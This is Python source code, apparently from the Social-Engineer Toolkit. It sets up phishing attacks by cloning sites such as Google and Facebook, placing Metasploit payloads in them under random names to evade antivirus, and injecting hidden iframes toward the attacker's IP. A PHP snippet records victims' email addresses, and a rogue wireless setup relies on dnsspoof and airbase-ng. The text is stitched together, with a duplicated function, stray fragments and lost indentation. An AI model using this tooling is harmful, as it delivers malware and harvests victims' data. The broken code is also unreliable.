core.debug_msg(core.mod_name(), "entering src.html.templates.template'", 1)
#
# used for pre-defined templates
#
print("""
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
""")
choice = raw_input(core.setprompt(["2"], "Select a template"))
if choice == "exit":
core.exit_set()
# file used for nextpage in java applet attack
# if nothing is selected
if choice == "":
choice = "1"
# if java required
if choice == "1":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
url = ""
# if google
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace("<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace("<body>",
"<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
filewrite.write(data)
core.print_status("All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
except:
pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
)
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info(
"For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface."
)
core.print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")"""
)
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status(
"Press ^X to exit nano and don't forget to save the updated file!")
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>",
'<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW +
"[*] Moving payload into cloned website." +
core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(
os.path.join(definepath,
"src/html/Signed_Update.jar.orig"),
os.path.join(core.setdir, applet_name))
shutil.copyfile(
os.path.join(core.setdir, applet_name),
os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone/msf.exe"))
print(
"\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
)
shutil.copyfile(
os.path.join(core.setdir, "web_clone/msf.exe"),
os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (
r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server,
args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server,
(web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print(
"{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(
core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop",
shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(
target=webserver.start_server,
args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
)
input(
"\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
.format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(
core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(
os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(
os.path.join(apache_path, "harvester_{}.txt".format(now)),
'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(
os.path.join(apache_path, "harvester_{}.txt".format(now))),
shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace(
"<body>", "<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
.format(now))
with open(os.path.join(apache_path, "index.php"),
"w") as filewrite:
filewrite.write(data)
core.print_status(
"All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()